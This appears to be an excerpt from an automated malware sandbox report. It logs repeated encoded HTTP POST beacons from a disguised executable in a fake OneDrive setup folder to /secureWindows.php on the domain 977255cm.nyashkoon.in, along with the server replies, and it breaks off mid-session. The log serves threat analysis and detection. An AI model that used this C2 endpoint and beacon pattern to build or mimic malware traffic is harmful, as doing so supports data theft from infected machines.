                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1225&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1284826&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        18  192.168.2.4  49754  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:22:22.968296051 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:23.324178934 CET  1076  OUT  Data Raw: 57 5e 59 57 50 5f 56 51 58 57 50 59 55 50 5b 52 54 52 5c 59 59 50 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^YWP_VQXWPYUP[RTR\YYPZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/#%=(-0=(:%-<Y,?#/Z%*#(9^$(69 F$,Z*
                                                        Oct 30, 2024 05:22:23.564693928 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:23.777857065 CET  801  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BSlB%2BiSUdBUS%2FOOvFn8yv%2B5n0pkt5FiQ1zMdkmhuwLuZMXpgBH3WKLaTn%2B2%2BfYW6HtmDH2R6xOdcdP3hJRlLqeQ3q9LL%2BL9yoQv%2FMY6%2Bh%2Bl%2BYsLQF74l9wZJrEdhhj923xgB7ukNQU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fbcef27461e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1973&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=812570&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        19  192.168.2.4  49755  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:22:24.214508057 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:24.574038029 CET  1076  OUT  Data Raw: 52 57 59 51 55 5a 53 56 58 57 50 59 55 5a 5b 52 54 52 5c 5a 59 50 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RWYQUZSVXWPYUZ[RTR\ZYPZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&8=(2Y%-96+1=_,,Z"9?')'^<%63(%[:: F$,Z*-
                                                        Oct 30, 2024 05:22:24.813105106 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:25.128501892 CET  782  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TnaiFITi2VoigCYjNxwF43egz1WblkMrTbulL5p1pBa5aCbfX12SQeTN4pkZ0lYRdotc96D7N1XoCiaWomJOVjjeMH6FQRItYXa1JGlWTajYFnpEYzZu%2BqJCBxMXgd13G7xbe9oPPjc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fc4bf31479f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1270&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1160256&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        20  192.168.2.4  49756  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:22:25.250540018 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        21  192.168.2.4  49757  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:22:25.581412077 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:25.933413029 CET  1340  OUT  Data Raw: 57 50 5c 56 55 59 53 51 58 57 50 59 55 5a 5b 53 54 5d 5c 5e 59 5c 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\VUYSQXWPYUZ[ST]\^Y\ZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,%(8"0;B-%0\2[,Z/*'"* &(+='!/* F$,Z*-
                                                        Oct 30, 2024 05:22:26.169406891 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:26.476856947 CET  931  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RuTveh7XDP1eGzua7c4GQNOuoTJDgwCbIGvfrSb3hno9J67FLncPfFfLe25mmhJ34GuqVmqwtFrJSsuGqSAwO2ahMru9535qtapk9R2AClB%2FLirCxTU69y4NfQxIp4S7L6shXrJ68Jo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fcd38e9eb33-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1315&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1163987&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 1e 3c 01 3f 08 25 33 0b 01 3f 02 22 06 2a 2e 2e 14 24 0f 33 05 26 3c 32 58 2b 05 33 59 3e 24 02 13 3f 1c 34 5a 21 35 3f 02 2a 3b 2f 46 0c 10 24 06 26 22 38 0f 3c 30 25 58 29 2b 3b 5c 20 20 08 12 28 2a 2f 51 22 33 06 1d 30 08 3d 0a 2f 2e 21 0f 2d 1b 21 00 3a 0a 20 56 3d 2a 21 57 08 14 22 5b 25 12 06 01 26 03 2b 00 26 0b 21 06 34 3f 23 10 36 28 2a 11 28 5d 38 55 27 33 38 59 24 30 33 57 32 39 3b 07 28 1f 2f 1c 31 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&<?%3?"*..$3&<2X+3Y>$?4Z!5?*;/F$&"8<0%X)+;\ (*/Q"30=/.!-!: V=*!W"[%&+&!4?#6(*(]8U'38Y$03W29;(/1"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        22 | 192.168.2.4 | 49758 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:25.702455997 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:26.058123112 CET | 1076 | OUT | Data Raw: 57 51 5c 5d 55 5e 53 51 58 57 50 59 55 5e 5b 53 54 5a 5c 5c 59 54 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\]U^SQXWPYU^[STZ\\YTZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z/ +8Z0=;-&#2'-:,] \?&_#+5'8: F$,Z*=
                                                        Oct 30, 2024 05:22:26.303546906 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:26.609280109 CET | 789 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bt6qpzlDu6zcSdF4LVvq6EuemePeH7GdtMgfo7MLE%2Fe2jg46KAdF89t%2Fzih7Zgw6Mgjj15f%2F5rnV0Mdn5OzpU%2FBmU77mYtsCaglY6YLNNYauIvlG6tSydy2K%2F0oNL%2BMyaH8TThTJTwU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fce0eea2851-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1356&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1078986&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:22:26.609304905 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0
                                                        Oct 30, 2024 05:22:26.936162949 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0
                                                        Oct 30, 2024 05:22:26.937203884 CET | 789 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bt6qpzlDu6zcSdF4LVvq6EuemePeH7GdtMgfo7MLE%2Fe2jg46KAdF89t%2Fzih7Zgw6Mgjj15f%2F5rnV0Mdn5OzpU%2FBmU77mYtsCaglY6YLNNYauIvlG6tSydy2K%2F0oNL%2BMyaH8TThTJTwU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fce0eea2851-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1356&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1078986&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        23 | 192.168.2.4 | 49759 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:26.937788010 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:27.292737961 CET | 1076 | OUT | Data Raw: 57 54 59 57 50 5e 53 57 58 57 50 59 55 51 5b 58 54 5d 5c 5e 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYWP^SWXWPYUQ[XT]\^YVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\- 9=8>]0-8:#&>,Z; X")7Z194?1_'+):* F$,Z*
                                                        Oct 30, 2024 05:22:27.544359922 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:27.750662088 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bJ56tQHHITTG4rwbja6ljZADPlC24WAwN6Tt2Xdb0z2RAgLLNLzaj%2FBSRIxLSQSapgB37%2BiekO5B0mLvccZYDzmuKekmcy9PzhGEf%2BZ1gyPj1%2FQzpppbLESxMZVXt5FYlckkNWPrTmU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fd5c9472cdc-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1122480&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        24 | 192.168.2.4 | 49760 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:27.875128031 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:28.230424881 CET | 1076 | OUT | Data Raw: 57 51 59 57 55 58 56 54 58 57 50 59 55 59 5b 5e 54 5c 5c 59 59 5d 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQYWUXVTXWPYUY[^T\\YY]Z[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%]82^<+:3[;.5&.#,\'4;[&9<5Z099 F$,Z*!
                                                        Oct 30, 2024 05:22:28.484014034 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:28.688694954 CET | 785 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CB1ZmMeYmMk4EE%2Bcm%2FeTjMchOmnX8j2zfe3U%2BLtnGlubGEi7ri4lfE4RfqSUm6ezPTtaxdiINmzKfjO0RiuTnvnlwF%2Fm6lmfAvjhzeFQwFqBPVZQ7vsoo8oMgUlhfg1%2FQ5BuRmOj8FY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fdba8dc2cdb-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1359624&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:22:28.688726902 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        25 | 192.168.2.4 | 49761 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:28.812566996 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:29.197020054 CET | 1076 | OUT | Data Raw: 57 5e 5c 51 50 5a 56 51 58 57 50 59 55 5c 5b 5c 54 5d 5c 5b 59 54 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\QPZVQXWPYU\[\T]\[YTZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;!+%'<-&,%-/,4X7:7X%:4(%1^08:.: F$,Z*5
                                                        Oct 30, 2024 05:22:29.411355972 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:29.936551094 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36ftcpVsemSGDzmSkG4HTraz4WssQgi1HyVWMaFpnyWo3YRu%2BwHa55loXdR%2FEpmwkecVygrrI5O0TVCUOpXNI9C6m0roUjtruE%2Bopq9HcHaz7rzisvOx3mVUtgZKg82%2BSlk2ejw8WmI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fe179b7e7aa-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1310&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1137470&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0
                                                        Oct 30, 2024 05:22:29.942617893 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36ftcpVsemSGDzmSkG4HTraz4WssQgi1HyVWMaFpnyWo3YRu%2BwHa55loXdR%2FEpmwkecVygrrI5O0TVCUOpXNI9C6m0roUjtruE%2Bopq9HcHaz7rzisvOx3mVUtgZKg82%2BSlk2ejw8WmI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fe179b7e7aa-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1310&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1137470&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        26 | 192.168.2.4 | 49762 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:30.063885927 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:30.417610884 CET | 1072 | OUT | Data Raw: 57 57 5c 55 55 59 56 57 58 57 50 59 55 58 5b 5b 54 5d 5c 5f 59 5d 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\UUYVWXWPYUX[[T]\_Y]ZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/-?*0-.51?/,#'':+_+*&;9:* F$,Z*!
                                                        Oct 30, 2024 05:22:30.669910908 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:30.981450081 CET | 792 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rBd7JkQHhfp8%2BmZ%2FiVUcZllYEV6v8rWEVVuXX44CoFnSnzx%2F71Dja4SodXTJjc8H2SF673aMiRi4o81oE5NyvQfLRzMRZn0ZsK%2B9JQcF9vwJ%2BijD2eB1Lr7xJJPNNEo59N%2F2shkj4E%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fe94a1b2e1e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1295&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1136577&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        27 | 192.168.2.4 | 49763 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
